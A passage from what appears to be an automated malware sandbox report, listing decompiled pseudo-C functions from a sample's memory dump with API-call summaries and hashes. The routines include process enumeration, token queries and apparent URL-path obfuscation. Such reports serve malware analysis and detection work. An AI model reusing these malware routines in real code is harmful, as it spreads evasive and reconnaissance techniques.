                                					_t29 = E04194039(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E04191D57(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E04193C84(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E041973C3( &_v32, _t39);
                                					goto L13;
                                				}
                                			}













                                APIs
                                • CreateEventA.KERNEL32(0419A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0419211B,?,00000001), ref: 04193083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 04193090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 0419309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 041930A2
                                  • Part of subcall function 04194039: WaitForSingleObject.KERNEL32(00000000,?,?,?,041930C2,?,041930C2,?,?,?,?,?,041930C2,?), ref: 04194113
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: e541cf89ac4a568ba8888ff684c9d6f531aff7f7422a206425b943f802802316
                                • Instruction ID: 2740a7c19966676e75ce11e50a0d1a8c8e4b32bade9f4353b43401fa2c9e8cc2
                                • Opcode Fuzzy Hash: e541cf89ac4a568ba8888ff684c9d6f531aff7f7422a206425b943f802802316
                                • Instruction Fuzzy Hash: FA215372E00219BBDF20AFE588C59EEB7EDAF48354B094469ED21A7100DB35FD458BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E04194D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E04196837(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}















                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04194D37
                                • lstrlenW.KERNEL32(?), ref: 04194D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04194D8E
                                • SysFreeString.OLEAUT32(?), ref: 04194DA2
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: cba14ff85587aa323085ea6bce318150038ff612ae67b3242b065455ba9286c9
                                • Instruction ID: ce52762bbb634d9577a5823dd108c7b813c8939a4c23351c5442a7ee2540c0e1
                                • Opcode Fuzzy Hash: cba14ff85587aa323085ea6bce318150038ff612ae67b3242b065455ba9286c9
                                • Instruction Fuzzy Hash: 73212A79A01219FFDF10DFA8C88499EBBF9FF58305B1441A9E905E7210EB31AE41CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E041952E5(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x419a290, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x419a2a8; // 0x0
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x419a2a8 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}


















                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,041962E0,00000000,?,00000000,041970D9,00000000,00000000), ref: 041952F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04195308
                                • memcpy.NTDLL(00000000,00000000,-00000008,?,?,?,041962E0,00000000,?,00000000,041970D9,00000000,00000000), ref: 0419534C
                                • memcpy.NTDLL(00000001,00000000,00000001,041970D9,00000000,00000000), ref: 0419536D
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: be93647d8b110113c80b559543456aafc7bb5bbddb1484a411c9b3d80eeb79e4
                                • Instruction ID: 7e568ec99f6dc8c27ca2398cce778ce96aab1983a1540c1019b7ba5ebc2b35d1
                                • Opcode Fuzzy Hash: be93647d8b110113c80b559543456aafc7bb5bbddb1484a411c9b3d80eeb79e4
                                • Instruction Fuzzy Hash: 691106B2A00114BFDB158B6ADCC4E9EBBFEEB81390B450266F40497250EB74AE44C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E0419513E() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x419a2d4; // 0x0
                                						_t2 = _t9 + 0x419bdd4; // 0x3207eb62
                                						_push( &_v264);
                                						if( *0x419a118() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}










                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0419514E
                                • Process32First.KERNEL32(00000000,?), ref: 04195161
                                • Process32Next.KERNEL32(00000000,?), ref: 0419518D
                                • CloseHandle.KERNEL32(00000000), ref: 0419519C
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 1b87e3d3a0446d6186f166524a028ccca14c519bc091392419037760f7769f70
                                • Instruction ID: 7405199bfab87f79f93569b45d5152812a6ed3e46cf847bba2f97521214acf93
                                • Opcode Fuzzy Hash: 1b87e3d3a0446d6186f166524a028ccca14c519bc091392419037760f7769f70
                                • Instruction Fuzzy Hash: 06F096732011247AEF22AA669C88DDB77EDDBC4358F040172E955E2000EB24AD8686A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04195076() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x419a2c4; // 0x350
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x419a308; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x419a2c4; // 0x350
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x419a290; // 0x63a0000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}









                                APIs
                                • SetEvent.KERNEL32(00000350,00000001,041956C9), ref: 04195081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04195090
                                • CloseHandle.KERNEL32(00000350), ref: 041950B1
                                • HeapDestroy.KERNEL32(063A0000), ref: 041950C1
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 2aaf96541bc6ee6c0113609c0da3912b2726d230e7a9e45392b37930499cc1b6
                                • Instruction ID: ad97305c7eef27e6e63bb2a9f1ff11d6d7ff69d4aada075e208018de44935ada
                                • Opcode Fuzzy Hash: 2aaf96541bc6ee6c0113609c0da3912b2726d230e7a9e45392b37930499cc1b6
                                • Instruction Fuzzy Hash: 98F01272B11311BBEE215E76D98CB5637EDEB04B91B0C0194FC14E7280DF29EC848990
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E041910DD(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				intOrPtr _t11;
                                				void* _t12;
                                				void** _t14;
                                
                                				_t14 = __esi;
                                				_t4 =  *0x419a37c; // 0x0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x419a37c; // 0x0
                                					if( *((intOrPtr*)(_t6 + 0x58)) == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t14;
                                				if(_t8 != 0 && _t8 != 0x419a030) {
                                					HeapFree( *0x419a290, 0, _t8);
                                				}
                                				_t14[1] = E0419578C(_v0);
                                				_t11 =  *0x419a37c; // 0x0
                                				_t12 = _t11 + 0x40;
                                				__imp__(_t12, _t14);
                                				return _t12;
                                			}











                                APIs
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041910E6
                                • Sleep.KERNEL32(0000000A,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 041910F0
                                • HeapFree.KERNEL32(00000000,?,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 04191118
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04191134
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 52dc82acaf19cdc1516abecacd81680af7978607a7ac92ed043f018f965f0e64
                                • Instruction ID: 7b2945ecccda5d8a09cd33164bb2f08502389c4a4c4e6c0f68417213bd04f363
                                • Opcode Fuzzy Hash: 52dc82acaf19cdc1516abecacd81680af7978607a7ac92ed043f018f965f0e64
                                • Instruction Fuzzy Hash: 12F0DAB1311281BBFB259F7ADA89A1A7BE8EF04780B088414F555D7351CB29ED84CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E041950DF() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x419a37c; // 0x0
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x419a37c; // 0x0
                                					if(_t5[0x16] == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x419a37c; // 0x0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x419b83e) {
                                					HeapFree( *0x419a290, 0, _t10);
                                					_t7 =  *0x419a37c; // 0x0
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}










                                APIs
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041950E8
                                • Sleep.KERNEL32(0000000A,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 041950F2
                                • HeapFree.KERNEL32(00000000,?,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 04195120
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04195135
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 9f4020f8b6c87bbec25f4f686201c0be7572758abbf566a887aac08d271da773
                                • Instruction ID: 674f3c27549d3f8abf975daebd1f9efa97555638b8a085d4b8af9390cc66efad
                                • Opcode Fuzzy Hash: 9f4020f8b6c87bbec25f4f686201c0be7572758abbf566a887aac08d271da773
                                • Instruction Fuzzy Hash: D1F0DAB5210240EBEB199F26EA99A1537E5EF48781B084058E912A7350CB39AC84CA21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E04193D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E04196837(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E04196837(_t28);
                                					if(_t30 == 0) {
                                						E041950CA(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E041977DD(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E041977DD(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}















                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04193CEE,00000000,00000000,00000000,00000000,?,?,0419106E,?,00000000), ref: 04193DA4
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04193CEE,00000000,00000000,00000000,00000000,?,?,0419106E), ref: 04193E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04193E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04193E1E
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 40a4cd3b6ebcbc910de0c86e2ad7a126b2aa5427ff726eeb05ee91ad37bbcdb6
                                • Instruction ID: ed89677c0d3a381112edfffd2de46ef444c3b249f5b3acbf792c1a294413f359
                                • Opcode Fuzzy Hash: 40a4cd3b6ebcbc910de0c86e2ad7a126b2aa5427ff726eeb05ee91ad37bbcdb6
                                • Instruction Fuzzy Hash: 4121A27260025AFBDF125F65C8D8AAB7FF9EF0A644B094055FC149B201E735ED41C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04195D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E04196837(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}








                                APIs
                                • lstrlenW.KERNEL32(2738C7B8,?,75145520,00000008,0419BD54,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D47
                                • lstrlenW.KERNEL32(04191B37,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D4E
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • memcpy.NTDLL(00000000,2738C7B8,751469A0,?,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D6E
                                • memcpy.NTDLL(751469A0,04191B37,00000002,00000000,2738C7B8,751469A0,?,?,04191B37,2738C7B8,0419BD54), ref: 04195D81
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: ea9456628b9b2072bb252b385c314a907e64a94cb337b9af2a380d8b83e59583
                                • Instruction ID: 4894884ddf7213feceb1da6aea0868c0b03e7cb38037c4d9606a820e31b203a1
                                • Opcode Fuzzy Hash: ea9456628b9b2072bb252b385c314a907e64a94cb337b9af2a380d8b83e59583
                                • Instruction Fuzzy Hash: F8F0E776900118BB9F11EBA9CC84C9A7BECEF092987154166EA08D7211E735EE149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                • lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                • lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 23fd5e8abd309a8cdcde2f801fdb08808862b22a960cb19ebde37189e7e2fdf7
                                • Instruction ID: ab4c49a4481d3796b96f717ea724454c0dc5f14072da3f521eda9865c6a908aa
                                • Opcode Fuzzy Hash: 23fd5e8abd309a8cdcde2f801fdb08808862b22a960cb19ebde37189e7e2fdf7
                                • Instruction Fuzzy Hash: 12E092B39012617787115BE6AC48C9FBBACEF8D651308045AFA10D3200CB38DC15CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                C-Code - Quality: 38%
                                			E052F2D06(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E052F6837(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E052F50CA(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}



















                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 052F2D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 052F2D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 052F2D7C
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 052F2D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 052F2DA6
                                • NtClose.NTDLL(00000000), ref: 052F2DB8
                                • NtClose.NTDLL(00000000), ref: 052F2DC2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: cb734ddf31eb59ceee975ad8ca0a4854c9af6bbbad0c78ed93d93875210690e2
                                • Instruction ID: b437b5945e3d2a2b269b383de4227f587308c59217ce55970e774d7e1286b45f
                                • Opcode Fuzzy Hash: cb734ddf31eb59ceee975ad8ca0a4854c9af6bbbad0c78ed93d93875210690e2
                                • Instruction Fuzzy Hash: 782105B2A10218BBDF01AF94EC49EDEBFBDEF08750F104066FA05E6150D7719A449BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 83%
                                			E052F2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				signed int _t66;
                                				void* _t69;
                                				void* _t71;
                                				signed int _t72;
                                				intOrPtr _t74;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t74 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x52fa298);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L052F7D8C();
                                					_v36.LowPart = _t46;
                                					_v32 = _t74;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x52fa2c4; // 0x30c
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x52fa2a4 = 5;
                                						} else {
                                							_t69 = E052F1AB8(_t74); // executed
                                							if(_t69 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x52fa2b8 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t72 = _v12;
                                						_t58 = _t72 << 4;
                                						_t76 = _t80 + (_t72 << 4) - 0x54;
                                						_t73 = _t72 + 1;
                                						_v24 = _t72 + 1;
                                						_t61 = E052F5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
                                						_v8.LowPart = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v24;
